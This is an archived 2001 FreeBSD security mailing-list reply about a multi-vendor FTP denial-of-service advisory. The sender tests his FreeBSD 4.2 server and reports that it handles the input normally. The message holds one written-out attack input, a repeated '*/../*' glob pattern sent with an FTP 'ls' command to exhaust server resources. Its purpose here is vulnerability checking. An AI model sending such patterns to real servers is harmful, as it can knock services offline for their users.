From owner-freebsd-security Thu Mar 15 14:50: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 67C0B37B719 for ; Thu, 15 Mar 2001 14:49:58 -0800 (PST) (envelope-from fpscha@ns1.via-net-works.net.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id TAA16613; Thu, 15 Mar 2001 19:50:23 -0300 (ART) From: Fernando Schapachnik Message-Id: <200103152250.TAA16613@ns1.via-net-works.net.ar> Subject: Re: Multiple vendors FTP denial of service (fwd) In-Reply-To: "from Attila Nagy at Mar 15, 2001 09:21:16 pm" To: Attila Nagy Date: Thu, 15 Mar 2001 19:50:23 -0300 (ART) Cc: freebsd-security@FreeBSD.ORG Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org En un mensaje anterior, Attila Nagy escribió: > > FreeBSD isn't listed, but also vulnerable, at least with the FTPd in > -STABLE. Sure? With 4.2-REL: Remote system type is UNIX. Using binary mode to transfer files. ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 150 Opening ASCII mode data connection for '/bin/ls'. 226 Transfer complete. ftp> ftp> ls 150 Opening ASCII mode data connection for '/bin/ls'. total 13 -rw-r--r-- 1 fpscha wheel 628 27 dic 10:38 .cshrc drwx------ 2 fpscha wheel 512 29 dic 13:17 .elm -rw------- 1 fpscha wheel 1517 20 feb 09:28 .history -rw-r--r-- 1 fpscha wheel 299 27 dic 10:38 .login [Everything normal, I mean] Regards. Fernando P. Schapachnik Administración de la red VIA NET.WORKS ARGENTINA S.A. fschapachnik@vianetworks.com.ar Conmutador: (54-11) 4323-3333 - Soporte: 0810-333-AYUDA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message